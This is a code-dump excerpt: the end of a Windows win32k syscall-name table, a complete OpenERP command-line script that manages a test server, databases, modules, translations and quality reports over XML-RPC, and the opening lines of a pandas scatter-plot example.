'NtGdiPlgBlt', # 0xed
'NtGdiPolyDraw', # 0xee
'NtGdiPolyPolyDraw', # 0xef
'NtGdiPolyTextOutW', # 0xf0
'NtGdiPtInRegion', # 0xf1
'NtGdiPtVisible', # 0xf2
'NtGdiQueryFonts', # 0xf3
'NtGdiQueryFontAssocInfo', # 0xf4
'NtGdiRectangle', # 0xf5
'NtGdiRectInRegion', # 0xf6
'NtGdiRectVisible', # 0xf7
'NtGdiRemoveFontResourceW', # 0xf8
'NtGdiRemoveFontMemResourceEx', # 0xf9
'NtGdiResetDC', # 0xfa
'NtGdiResizePalette', # 0xfb
'NtGdiRestoreDC', # 0xfc
'NtGdiRoundRect', # 0xfd
'NtGdiSaveDC', # 0xfe
'NtGdiScaleViewportExtEx', # 0xff
'NtGdiScaleWindowExtEx', # 0x100
'NtGdiSelectBitmap', # 0x101
'NtGdiSelectBrush', # 0x102
'NtGdiSelectClipPath', # 0x103
'NtGdiSelectFont', # 0x104
'NtGdiSelectPen', # 0x105
'NtGdiSetBitmapAttributes', # 0x106
'NtGdiSetBitmapBits', # 0x107
'NtGdiSetBitmapDimension', # 0x108
'NtGdiSetBoundsRect', # 0x109
'NtGdiSetBrushAttributes', # 0x10a
'NtGdiSetBrushOrg', # 0x10b
'NtGdiSetColorAdjustment', # 0x10c
'NtGdiSetColorSpace', # 0x10d
'NtGdiSetDeviceGammaRamp', # 0x10e
'NtGdiSetDIBitsToDeviceInternal', # 0x10f
'NtGdiSetFontEnumeration', # 0x110
'NtGdiSetFontXform', # 0x111
'NtGdiSetIcmMode', # 0x112
'NtGdiSetLinkedUFIs', # 0x113
'NtGdiSetMagicColors', # 0x114
'NtGdiSetMetaRgn', # 0x115
'NtGdiSetMiterLimit', # 0x116
'NtGdiGetDeviceWidth', # 0x117
'NtGdiMirrorWindowOrg', # 0x118
'NtGdiSetLayout', # 0x119
'NtGdiSetPixel', # 0x11a
'NtGdiSetPixelFormat', # 0x11b
'NtGdiSetRectRgn', # 0x11c
'NtGdiSetSystemPaletteUse', # 0x11d
'NtGdiSetTextJustification', # 0x11e
'NtGdiSetupPublicCFONT', # 0x11f
'NtGdiSetVirtualResolution', # 0x120
'NtGdiSetSizeDevice', # 0x121
'NtGdiStartDoc', # 0x122
'NtGdiStartPage', # 0x123
'NtGdiStretchBlt', # 0x124
'NtGdiStretchDIBitsInternal', # 0x125
'NtGdiStrokeAndFillPath', # 0x126
'NtGdiStrokePath', # 0x127
'NtGdiSwapBuffers', # 0x128
'NtGdiTransformPoints', # 0x129
'NtGdiTransparentBlt', # 0x12a
'NtGdiUnloadPrinterDriver', # 0x12b
'NtGdiUnmapMemFont', # 0x12c
'NtGdiUnrealizeObject', # 0x12d
'NtGdiUpdateColors', # 0x12e
'NtGdiWidenPath', # 0x12f
'NtUserActivateKeyboardLayout', # 0x130
'NtUserAlterWindowStyle', # 0x131
'NtUserAssociateInputContext', # 0x132
'NtUserAttachThreadInput', # 0x133
'NtUserBeginPaint', # 0x134
'NtUserBitBltSysBmp', # 0x135
'NtUserBlockInput', # 0x136
'NtUserBuildHimcList', # 0x137
'NtUserBuildHwndList', # 0x138
'NtUserBuildNameList', # 0x139
'NtUserBuildPropList', # 0x13a
'NtUserCallHwnd', # 0x13b
'NtUserCallHwndLock', # 0x13c
'NtUserCallHwndOpt', # 0x13d
'NtUserCallHwndParam', # 0x13e
'NtUserCallHwndParamLock', # 0x13f
'NtUserCallMsgFilter', # 0x140
'NtUserCallNextHookEx', # 0x141
'NtUserCallNoParam', # 0x142
'NtUserCallOneParam', # 0x143
'NtUserCallTwoParam', # 0x144
'NtUserChangeClipboardChain', # 0x145
'NtUserChangeDisplaySettings', # 0x146
'NtUserCheckImeHotKey', # 0x147
'NtUserCheckMenuItem', # 0x148
'NtUserChildWindowFromPointEx', # 0x149
'NtUserClipCursor', # 0x14a
'NtUserCloseClipboard', # 0x14b
'NtUserCloseDesktop', # 0x14c
'NtUserCloseWindowStation', # 0x14d
'NtUserConsoleControl', # 0x14e
'NtUserConvertMemHandle', # 0x14f
'NtUserCopyAcceleratorTable', # 0x150
'NtUserCountClipboardFormats', # 0x151
'NtUserCreateAcceleratorTable', # 0x152
'NtUserCreateCaret', # 0x153
'NtUserCreateDesktop', # 0x154
'NtUserCreateInputContext', # 0x155
'NtUserCreateLocalMemHandle', # 0x156
'NtUserCreateWindowEx', # 0x157
'NtUserCreateWindowStation', # 0x158
'NtUserDdeGetQualityOfService', # 0x159
'NtUserDdeInitialize', # 0x15a
'NtUserDdeSetQualityOfService', # 0x15b
'NtUserDeferWindowPos', # 0x15c
'NtUserDefSetText', # 0x15d
'NtUserDeleteMenu', # 0x15e
'NtUserDestroyAcceleratorTable', # 0x15f
'NtUserDestroyCursor', # 0x160
'NtUserDestroyInputContext', # 0x161
'NtUserDestroyMenu', # 0x162
'NtUserDestroyWindow', # 0x163
'NtUserDisableThreadIme', # 0x164
'NtUserDispatchMessage', # 0x165
'NtUserDragDetect', # 0x166
'NtUserDragObject', # 0x167
'NtUserDrawAnimatedRects', # 0x168
'NtUserDrawCaption', # 0x169
'NtUserDrawCaptionTemp', # 0x16a
'NtUserDrawIconEx', # 0x16b
'NtUserDrawMenuBarTemp', # 0x16c
'NtUserEmptyClipboard', # 0x16d
'NtUserEnableMenuItem', # 0x16e
'NtUserEnableScrollBar', # 0x16f
'NtUserEndDeferWindowPosEx', # 0x170
'NtUserEndMenu', # 0x171
'NtUserEndPaint', # 0x172
'NtUserEnumDisplayDevices', # 0x173
'NtUserEnumDisplayMonitors', # 0x174
'NtUserEnumDisplaySettings', # 0x175
'NtUserEvent', # 0x176
'NtUserExcludeUpdateRgn', # 0x177
'NtUserFillWindow', # 0x178
'NtUserFindExistingCursorIcon', # 0x179
'NtUserFindWindowEx', # 0x17a
'NtUserFlashWindowEx', # 0x17b
'NtUserGetAltTabInfo', # 0x17c
'NtUserGetAncestor', # 0x17d
'NtUserGetAppImeLevel', # 0x17e
'NtUserGetAsyncKeyState', # 0x17f
'NtUserGetAtomName', # 0x180
'NtUserGetCaretBlinkTime', # 0x181
'NtUserGetCaretPos', # 0x182
'NtUserGetClassInfo', # 0x183
'NtUserGetClassName', # 0x184
'NtUserGetClipboardData', # 0x185
'NtUserGetClipboardFormatName', # 0x186
'NtUserGetClipboardOwner', # 0x187
'NtUserGetClipboardSequenceNumber', # 0x188
'NtUserGetClipboardViewer', # 0x189
'NtUserGetClipCursor', # 0x18a
'NtUserGetComboBoxInfo', # 0x18b
'NtUserGetControlBrush', # 0x18c
'NtUserGetControlColor', # 0x18d
'NtUserGetCPD', # 0x18e
'NtUserGetCursorFrameInfo', # 0x18f
'NtUserGetCursorInfo', # 0x190
'NtUserGetDC', # 0x191
'NtUserGetDCEx', # 0x192
'NtUserGetDoubleClickTime', # 0x193
'NtUserGetForegroundWindow', # 0x194
'NtUserGetGuiResources', # 0x195
'NtUserGetGUIThreadInfo', # 0x196
'NtUserGetIconInfo', # 0x197
'NtUserGetIconSize', # 0x198
'NtUserGetImeHotKey', # 0x199
'NtUserGetImeInfoEx', # 0x19a
'NtUserGetInternalWindowPos', # 0x19b
'NtUserGetKeyboardLayoutList', # 0x19c
'NtUserGetKeyboardLayoutName', # 0x19d
'NtUserGetKeyboardState', # 0x19e
'NtUserGetKeyNameText', # 0x19f
'NtUserGetKeyState', # 0x1a0
'NtUserGetListBoxInfo', # 0x1a1
'NtUserGetMenuBarInfo', # 0x1a2
'NtUserGetMenuIndex', # 0x1a3
'NtUserGetMenuItemRect', # 0x1a4
'NtUserGetMessage', # 0x1a5
'NtUserGetMouseMovePointsEx', # 0x1a6
'NtUserGetObjectInformation', # 0x1a7
'NtUserGetOpenClipboardWindow', # 0x1a8
'NtUserGetPriorityClipboardFormat', # 0x1a9
'NtUserGetProcessWindowStation', # 0x1aa
'NtUserGetRawInputBuffer', # 0x1ab
'NtUserGetRawInputData', # 0x1ac
'NtUserGetRawInputDeviceInfo', # 0x1ad
'NtUserGetRawInputDeviceList', # 0x1ae
'NtUserGetRegisteredRawInputDevices', # 0x1af
'NtUserGetScrollBarInfo', # 0x1b0
'NtUserGetSystemMenu', # 0x1b1
'NtUserGetThreadDesktop', # 0x1b2
'NtUserGetThreadState', # 0x1b3
'NtUserGetTitleBarInfo', # 0x1b4
'NtUserGetUpdateRect', # 0x1b5
'NtUserGetUpdateRgn', # 0x1b6
'NtUserGetWindowDC', # 0x1b7
'NtUserGetWindowPlacement', # 0x1b8
'NtUserGetWOWClass', # 0x1b9
'NtUserHardErrorControl', # 0x1ba
'NtUserHideCaret', # 0x1bb
'NtUserHiliteMenuItem', # 0x1bc
'NtUserImpersonateDdeClientWindow', # 0x1bd
'NtUserInitialize', # 0x1be
'NtUserInitializeClientPfnArrays', # 0x1bf
'NtUserInitTask', # 0x1c0
'NtUserInternalGetWindowText', # 0x1c1
'NtUserInvalidateRect', # 0x1c2
'NtUserInvalidateRgn', # 0x1c3
'NtUserIsClipboardFormatAvailable', # 0x1c4
'NtUserKillTimer', # 0x1c5
'NtUserLoadKeyboardLayoutEx', # 0x1c6
'NtUserLockWindowStation', # 0x1c7
'NtUserLockWindowUpdate', # 0x1c8
'NtUserLockWorkStation', # 0x1c9
'NtUserMapVirtualKeyEx', # 0x1ca
'NtUserMenuItemFromPoint', # 0x1cb
'NtUserMessageCall', # 0x1cc
'NtUserMinMaximize', # 0x1cd
'NtUserMNDragLeave', # 0x1ce
'NtUserMNDragOver', # 0x1cf
'NtUserModifyUserStartupInfoFlags', # 0x1d0
'NtUserMoveWindow', # 0x1d1
'NtUserNotifyIMEStatus', # 0x1d2
'NtUserNotifyProcessCreate', # 0x1d3
'NtUserNotifyWinEvent', # 0x1d4
'NtUserOpenClipboard', # 0x1d5
'NtUserOpenDesktop', # 0x1d6
'NtUserOpenInputDesktop', # 0x1d7
'NtUserOpenWindowStation', # 0x1d8
'NtUserPaintDesktop', # 0x1d9
'NtUserPeekMessage', # 0x1da
'NtUserPostMessage', # 0x1db
'NtUserPostThreadMessage', # 0x1dc
'NtUserPrintWindow', # 0x1dd
'NtUserProcessConnect', # 0x1de
'NtUserQueryInformationThread', # 0x1df
'NtUserQueryInputContext', # 0x1e0
'NtUserQuerySendMessage', # 0x1e1
'NtUserQueryUserCounters', # 0x1e2
'NtUserQueryWindow', # 0x1e3
'NtUserRealChildWindowFromPoint', # 0x1e4
'NtUserRealInternalGetMessage', # 0x1e5
'NtUserRealWaitMessageEx', # 0x1e6
'NtUserRedrawWindow', # 0x1e7
'NtUserRegisterClassExWOW', # 0x1e8
'NtUserRegisterUserApiHook', # 0x1e9
'NtUserRegisterHotKey', # 0x1ea
'NtUserRegisterRawInputDevices', # 0x1eb
'NtUserRegisterTasklist', # 0x1ec
'NtUserRegisterWindowMessage', # 0x1ed
'NtUserRemoveMenu', # 0x1ee
'NtUserRemoveProp', # 0x1ef
'NtUserResolveDesktop', # 0x1f0
'NtUserResolveDesktopForWOW', # 0x1f1
'NtUserSBGetParms', # 0x1f2
'NtUserScrollDC', # 0x1f3
'NtUserScrollWindowEx', # 0x1f4
'NtUserSelectPalette', # 0x1f5
'NtUserSendInput', # 0x1f6
'NtUserSetActiveWindow', # 0x1f7
'NtUserSetAppImeLevel', # 0x1f8
'NtUserSetCapture', # 0x1f9
'NtUserSetClassLong', # 0x1fa
'NtUserSetClassWord', # 0x1fb
'NtUserSetClipboardData', # 0x1fc
'NtUserSetClipboardViewer', # 0x1fd
'NtUserSetConsoleReserveKeys', # 0x1fe
'NtUserSetCursor', # 0x1ff
'NtUserSetCursorContents', # 0x200
'NtUserSetCursorIconData', # 0x201
'NtUserSetDbgTag', # 0x202
'NtUserSetFocus', # 0x203
'NtUserSetImeHotKey', # 0x204
'NtUserSetImeInfoEx', # 0x205
'NtUserSetImeOwnerWindow', # 0x206
'NtUserSetInformationProcess', # 0x207
'NtUserSetInformationThread', # 0x208
'NtUserSetInternalWindowPos', # 0x209
'NtUserSetKeyboardState', # 0x20a
'NtUserSetLogonNotifyWindow', # 0x20b
'NtUserSetMenu', # 0x20c
'NtUserSetMenuContextHelpId', # 0x20d
'NtUserSetMenuDefaultItem', # 0x20e
'NtUserSetMenuFlagRtoL', # 0x20f
'NtUserSetObjectInformation', # 0x210
'NtUserSetParent', # 0x211
'NtUserSetProcessWindowStation', # 0x212
'NtUserSetProp', # 0x213
'NtUserSetRipFlags', # 0x214
'NtUserSetScrollInfo', # 0x215
'NtUserSetShellWindowEx', # 0x216
'NtUserSetSysColors', # 0x217
'NtUserSetSystemCursor', # 0x218
'NtUserSetSystemMenu', # 0x219
'NtUserSetSystemTimer', # 0x21a
'NtUserSetThreadDesktop', # 0x21b
'NtUserSetThreadLayoutHandles', # 0x21c
'NtUserSetThreadState', # 0x21d
'NtUserSetTimer', # 0x21e
'NtUserSetWindowFNID', # 0x21f
'NtUserSetWindowLong', # 0x220
'NtUserSetWindowPlacement', # 0x221
'NtUserSetWindowPos', # 0x222
'NtUserSetWindowRgn', # 0x223
'NtUserSetWindowsHookAW', # 0x224
'NtUserSetWindowsHookEx', # 0x225
'NtUserSetWindowStationUser', # 0x226
'NtUserSetWindowWord', # 0x227
'NtUserSetWinEventHook', # 0x228
'NtUserShowCaret', # 0x229
'NtUserShowScrollBar', # 0x22a
'NtUserShowWindow', # 0x22b
'NtUserShowWindowAsync', # 0x22c
'NtUserSoundSentry', # 0x22d
'NtUserSwitchDesktop', # 0x22e
'NtUserSystemParametersInfo', # 0x22f
'NtUserTestForInteractiveUser', # 0x230
'NtUserThunkedMenuInfo', # 0x231
'NtUserThunkedMenuItemInfo', # 0x232
'NtUserToUnicodeEx', # 0x233
'NtUserTrackMouseEvent', # 0x234
'NtUserTrackPopupMenuEx', # 0x235
'NtUserCalcMenuBar', # 0x236
'NtUserPaintMenuBar', # 0x237
'NtUserTranslateAccelerator', # 0x238
'NtUserTranslateMessage', # 0x239
'NtUserUnhookWindowsHookEx', # 0x23a
'NtUserUnhookWinEvent', # 0x23b
'NtUserUnloadKeyboardLayout', # 0x23c
'NtUserUnlockWindowStation', # 0x23d
'NtUserUnregisterClass', # 0x23e
'NtUserUnregisterUserApiHook', # 0x23f
'NtUserUnregisterHotKey', # 0x240
'NtUserUpdateInputContext', # 0x241
'NtUserUpdateInstance', # 0x242
'NtUserUpdateLayeredWindow', # 0x243
'NtUserGetLayeredWindowAttributes', # 0x244
'NtUserSetLayeredWindowAttributes', # 0x245
'NtUserUpdatePerUserSystemParameters', # 0x246
'NtUserUserHandleGrantAccess', # 0x247
'NtUserValidateHandleSecure', # 0x248
'NtUserValidateRect', # 0x249
'NtUserValidateTimerCallback', # 0x24a
'NtUserVkKeyScanEx', # 0x24b
'NtUserWaitForInputIdle', # 0x24c
'NtUserWaitForMsgAndEvent', # 0x24d
'NtUserWaitMessage', # 0x24e
'NtUserWin32PoolAllocationStats', # 0x24f
'NtUserWindowFromPoint', # 0x250
'NtUserYieldTask', # 0x251
'NtUserRemoteConnect', # 0x252
'NtUserRemoteRedrawRectangle', # 0x253
'NtUserRemoteRedrawScreen', # 0x254
'NtUserRemoteStopScreenUpdates', # 0x255
'NtUserCtxDisplayIOCtl', # 0x256
'NtGdiEngAssociateSurface', # 0x257
'NtGdiEngCreateBitmap', # 0x258
'NtGdiEngCreateDeviceSurface', # 0x259
'NtGdiEngCreateDeviceBitmap', # 0x25a
'NtGdiEngCreatePalette', # 0x25b
'NtGdiEngComputeGlyphSet', # 0x25c
'NtGdiEngCopyBits', # 0x25d
'NtGdiEngDeletePalette', # 0x25e
'NtGdiEngDeleteSurface', # 0x25f
'NtGdiEngEraseSurface', # 0x260
'NtGdiEngUnlockSurface', # 0x261
'NtGdiEngLockSurface', # 0x262
'NtGdiEngBitBlt', # 0x263
'NtGdiEngStretchBlt', # 0x264
'NtGdiEngPlgBlt', # 0x265
'NtGdiEngMarkBandingSurface', # 0x266
'NtGdiEngStrokePath', # 0x267
'NtGdiEngFillPath', # 0x268
'NtGdiEngStrokeAndFillPath', # 0x269
'NtGdiEngPaint', # 0x26a
'NtGdiEngLineTo', # 0x26b
'NtGdiEngAlphaBlend', # 0x26c
'NtGdiEngGradientFill', # 0x26d
'NtGdiEngTransparentBlt', # 0x26e
'NtGdiEngTextOut', # 0x26f
'NtGdiEngStretchBltROP', # 0x270
'NtGdiXLATEOBJ_cGetPalette', # 0x271
'NtGdiXLATEOBJ_iXlate', # 0x272
'NtGdiXLATEOBJ_hGetColorTransform', # 0x273
'NtGdiCLIPOBJ_bEnum', # 0x274
'NtGdiCLIPOBJ_cEnumStart', # 0x275
'NtGdiCLIPOBJ_ppoGetPath', # 0x276
'NtGdiEngDeletePath', # 0x277
'NtGdiEngCreateClip', # 0x278
'NtGdiEngDeleteClip', # 0x279
'NtGdiBRUSHOBJ_ulGetBrushColor', # 0x27a
'NtGdiBRUSHOBJ_pvAllocRbrush', # 0x27b
'NtGdiBRUSHOBJ_pvGetRbrush', # 0x27c
'NtGdiBRUSHOBJ_hGetColorTransform', # 0x27d
'NtGdiXFORMOBJ_bApplyXform', # 0x27e
'NtGdiXFORMOBJ_iGetXform', # 0x27f
'NtGdiFONTOBJ_vGetInfo', # 0x280
'NtGdiFONTOBJ_pxoGetXform', # 0x281
'NtGdiFONTOBJ_cGetGlyphs', # 0x282
'NtGdiFONTOBJ_pifi', # 0x283
'NtGdiFONTOBJ_pfdg', # 0x284
'NtGdiFONTOBJ_pQueryGlyphAttrs', # 0x285
'NtGdiFONTOBJ_pvTrueTypeFontFile', # 0x286
'NtGdiFONTOBJ_cGetAllGlyphHandles', # 0x287
'NtGdiSTROBJ_bEnum', # 0x288
'NtGdiSTROBJ_bEnumPositionsOnly', # 0x289
'NtGdiSTROBJ_bGetAdvanceWidths', # 0x28a
'NtGdiSTROBJ_vEnumStart', # 0x28b
'NtGdiSTROBJ_dwGetCodePage', # 0x28c
'NtGdiPATHOBJ_vGetBounds', # 0x28d
'NtGdiPATHOBJ_bEnum', # 0x28e
'NtGdiPATHOBJ_vEnumStart', # 0x28f
'NtGdiPATHOBJ_vEnumStartClipLines', # 0x290
'NtGdiPATHOBJ_bEnumClipLines', # 0x291
'NtGdiGetDhpdev', # 0x292
'NtGdiEngCheckAbort', # 0x293
'NtGdiHT_Get8BPPFormatPalette', # 0x294
'NtGdiHT_Get8BPPMaskPalette', # 0x295
'NtGdiUpdateTransform', # 0x296
'NtGdiSetPUMPDOBJ', # 0x297
'NtGdiBRUSHOBJ_DeleteRbrush', # 0x298
'NtGdiUMPDEngFreeUserMem', # 0x299
'NtGdiDrawStream', # 0x29a
],
]
| gpl-2.0 |
dkodnik/Ant | openerp/addons/base_quality_interrogation.py | 58 | 14692 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2009 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import xmlrpclib
import optparse
import sys
import threading
import os
import time
import base64
import socket
import string
admin_passwd = 'admin'
waittime = 10
wait_count = 0
wait_limit = 12
def to_decode(s):
try:
return s.encode('utf-8')
except UnicodeError:
try:
return s.encode('latin')
except UnicodeError:
try:
return s.decode('ascii')
except UnicodeError:
return s
def start_server(root_path, port, netport, addons_path):
os.system('python2.5 %sopenerp-server --pidfile=openerp.pid --no-xmlrpcs --xmlrpc-port=%s --netrpc-port=%s --addons-path=%s' %(root_path, str(port),str(netport),addons_path))
def clean():
if os.path.isfile('openerp.pid'):
ps = open('openerp.pid')
if ps:
pid = int(ps.read())
ps.close()
if pid:
os.kill(pid,9)
def execute(connector, method, *args):
global wait_count
res = False
try:
res = getattr(connector,method)(*args)
except socket.error,e:
if e.args[0] == 111:
if wait_count > wait_limit:
print "Server is taking too long to start, it has exceeded the maximum limit of %d seconds." % wait_limit
clean()
sys.exit(1)
print 'Please wait %d sec to start server....' % waittime
wait_count += 1
time.sleep(waittime)
res = execute(connector, method, *args)
else:
raise e
wait_count = 0
return res
def login(uri, dbname, user, pwd):
conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/common')
uid = execute(conn,'login',dbname, user, pwd)
return uid
def import_translate(uri, user, pwd, dbname, translate_in):
uid = login(uri, dbname, user, pwd)
if uid:
conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
wiz_id = execute(conn,'create',dbname, uid, pwd, 'base.language.import')
for trans_in in translate_in:
lang,ext = os.path.splitext(trans_in.split('/')[-1])
state = 'init'
datas = {'form':{}}
while state!='end':
res = execute(conn,'execute',dbname, uid, pwd, wiz_id, datas, state, {})
if 'datas' in res:
datas['form'].update( res['datas'].get('form',{}) )
if res['type']=='form':
for field in res['fields'].keys():
datas['form'][field] = res['fields'][field].get('value', False)
state = res['state'][-1][0]
trans_obj = open(trans_in)
datas['form'].update({
'name': lang,
'code': lang,
'data' : base64.encodestring(trans_obj.read())
})
trans_obj.close()
elif res['type']=='action':
state = res['state']
def check_quality(uri, user, pwd, dbname, modules, quality_logs):
uid = login(uri, dbname, user, pwd)
quality_logs += 'quality-logs'
if uid:
conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
final = {}
for module in modules:
qualityresult = {}
test_detail = {}
quality_result = execute(conn,'execute', dbname, uid, pwd,'module.quality.check','check_quality',module)
detail_html = ''
html = '''<html><body><a name="TOP"></a>'''
html +="<h1> Module: %s </h1>"%(quality_result['name'])
html += "<h2> Final score: %s</h2>"%(quality_result['final_score'])
html += "<div id='tabs'>"
html += "<ul>"
for x,y,detail in quality_result['check_detail_ids']:
test = detail.get('name')
msg = detail.get('message','')
score = round(float(detail.get('score',0)),2)
html += "<li><a href=\"#%s\">%s</a></li>"%(test.replace(' ','-'),test)
detail_html +='''<div id=\"%s\"><h3>%s (Score : %s)</h3><font color=red><h5>%s</h5></font>%s</div>'''%(test.replace(' ', '-'), test, score, msg, detail.get('detail', ''))
test_detail[test] = (score,msg,detail.get('detail',''))
html += "</ul>"
html += "%s"% detail_html
html += "</div></body></html>"
if not os.path.isdir(quality_logs):
os.mkdir(quality_logs)
fp = open('%s/%s.html'%(quality_logs,module),'wb')
fp.write(to_decode(html))
fp.close()
#final[quality_result['name']] = (quality_result['final_score'],html,test_detail)
#fp = open('quality_log.pck','wb')
#pck_obj = pickle.dump(final,fp)
#fp.close()
#print "LOG PATH%s"%(os.path.realpath('quality_log.pck'))
return True
else:
print 'Login Failed...'
clean()
sys.exit(1)
def wait(id,url=''):
progress=0.0
sock2 = xmlrpclib.ServerProxy(url+'/xmlrpc/db')
while not progress==1.0:
progress,users = execute(sock2,'get_progress',admin_passwd, id)
return True
def create_db(uri, dbname, user='admin', pwd='admin', lang='en_US'):
conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/db')
obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
wiz_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
login_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/common')
db_list = execute(conn, 'list')
if dbname in db_list:
drop_db(uri, dbname)
id = execute(conn,'create',admin_passwd, dbname, True, lang)
wait(id,uri)
install_module(uri, dbname, ['base_module_quality'],user=user,pwd=pwd)
return True
def drop_db(uri, dbname):
conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/db')
db_list = execute(conn,'list')
if dbname in db_list:
execute(conn, 'drop', admin_passwd, dbname)
return True
def make_links(uri, uid, dbname, source, destination, module, user, pwd):
if module in ('base','quality_integration_server'):
return True
if os.path.islink(destination + '/' + module):
os.unlink(destination + '/' + module)
for path in source:
if os.path.isdir(path + '/' + module):
os.symlink(path + '/' + module, destination + '/' + module)
obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'update_list')
module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name','=',module)])
if len(module_ids):
data = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'read', module_ids[0],['name','dependencies_id'])
dep_datas = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module.dependency', 'read', data['dependencies_id'],['name'])
for dep_data in dep_datas:
make_links(uri, uid, dbname, source, destination, dep_data['name'], user, pwd)
return False
def install_module(uri, dbname, modules, addons='', extra_addons='', user='admin', pwd='admin'):
uid = login(uri, dbname, user, pwd)
if extra_addons:
extra_addons = extra_addons.split(',')
if uid:
if addons and extra_addons:
for module in modules:
make_links(uri, uid, dbname, extra_addons, addons, module, user, pwd)
obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
wizard_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name','in',modules)])
execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'button_install', module_ids)
wiz_id = execute(wizard_conn, 'create', dbname, uid, pwd, 'module.upgrade.simple')
state = 'init'
datas = {}
#while state!='menu':
while state!='end':
res = execute(wizard_conn, 'execute', dbname, uid, pwd, wiz_id, datas, state, {})
if state == 'init':
state = 'start'
elif state == 'start':
state = 'end'
return True
def upgrade_module(uri, dbname, modules, user='admin', pwd='admin'):
uid = login(uri, dbname, user, pwd)
if uid:
obj_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/object')
wizard_conn = xmlrpclib.ServerProxy(uri + '/xmlrpc/wizard')
module_ids = execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'search', [('name','in',modules)])
execute(obj_conn, 'execute', dbname, uid, pwd, 'ir.module.module', 'button_upgrade', module_ids)
wiz_id = execute(wizard_conn, 'create', dbname, uid, pwd, 'module.upgrade.simple')
state = 'init'
datas = {}
#while state!='menu':
while state!='end':
res = execute(wizard_conn, 'execute', dbname, uid, pwd, wiz_id, datas, state, {})
if state == 'init':
state = 'start'
elif state == 'start':
state = 'end'
return True
usage = """%prog command [options]
Basic Commands:
start-server Start Server
create-db Create new database
drop-db Drop database
install-module Install module
upgrade-module Upgrade module
install-translation Install translation file
check-quality Calculate quality and dump quality result into quality_log.pck using pickle
"""
parser = optparse.OptionParser(usage)
parser.add_option("--modules", dest="modules",
help="specify modules to install or check quality")
parser.add_option("--addons-path", dest="addons_path", help="specify the addons path")
parser.add_option("--quality-logs", dest="quality_logs", help="specify the path of quality logs files which has to stores")
parser.add_option("--root-path", dest="root_path", help="specify the root path")
parser.add_option("-p", "--port", dest="port", help="specify the TCP port", type="int")
parser.add_option("--net_port", dest="netport",help="specify the TCP port for netrpc")
parser.add_option("-d", "--database", dest="db_name", help="specify the database name")
parser.add_option("--login", dest="login", help="specify the User Login")
parser.add_option("--password", dest="pwd", help="specify the User Password")
parser.add_option("--translate-in", dest="translate_in",
help="specify .po files to import translation terms")
parser.add_option("--extra-addons", dest="extra_addons",
help="specify extra_addons and trunkCommunity modules path ")
(opt, args) = parser.parse_args()
if len(args) != 1:
parser.error("incorrect number of arguments")
command = args[0]
if command not in ('start-server','create-db','drop-db','install-module','upgrade-module','check-quality','install-translation'):
parser.error("incorrect command")
def die(cond, msg):
if cond:
print msg
sys.exit(1)
die(opt.modules and (not opt.db_name),
"the modules option cannot be used without the database (-d) option")
die(opt.translate_in and (not opt.db_name),
"the translate-in option cannot be used without the database (-d) option")
options = {
'addons-path' : opt.addons_path or 'addons',
'quality-logs' : opt.quality_logs or '',
'root-path' : opt.root_path or '',
'translate-in': [],
'port' : opt.port or 8069,
'netport':opt.netport or 8070,
'database': opt.db_name or 'terp',
'modules' : map(string.strip, opt.modules.split(',')) if opt.modules else [],
'login' : opt.login or 'admin',
'pwd' : opt.pwd or '',
'extra-addons':opt.extra_addons or []
}
# Hint:i18n-import=purchase:ar_AR.po+sale:fr_FR.po,nl_BE.po
if opt.translate_in:
translate = opt.translate_in
for module_name,po_files in map(lambda x:tuple(x.split(':')),translate.split('+')):
for po_file in po_files.split(','):
if module_name == 'base':
po_link = '%saddons/%s/i18n/%s'%(options['root-path'],module_name,po_file)
else:
po_link = '%s/%s/i18n/%s'%(options['addons-path'], module_name, po_file)
options['translate-in'].append(po_link)
uri = 'http://localhost:' + str(options['port'])
server_thread = threading.Thread(target=start_server,
args=(options['root-path'], options['port'],options['netport'], options['addons-path']))
try:
server_thread.start()
if command == 'create-db':
create_db(uri, options['database'], options['login'], options['pwd'])
if command == 'drop-db':
drop_db(uri, options['database'])
if command == 'install-module':
install_module(uri, options['database'], options['modules'],options['addons-path'],options['extra-addons'],options['login'], options['pwd'])
if command == 'upgrade-module':
upgrade_module(uri, options['database'], options['modules'], options['login'], options['pwd'])
if command == 'check-quality':
check_quality(uri, options['login'], options['pwd'], options['database'], options['modules'], options['quality-logs'])
if command == 'install-translation':
import_translate(uri, options['login'], options['pwd'], options['database'], options['translate-in'])
clean()
sys.exit(0)
except xmlrpclib.Fault, e:
print e.faultString
clean()
sys.exit(1)
except Exception, e:
print e
clean()
sys.exit(1)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
FernanOrtega/DAT210x | Module3/notes/2Dscatter_example.py | 1 | 1245 | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jul 11 21:14:57 2017
@author: fernando
"""
import pandas as pd
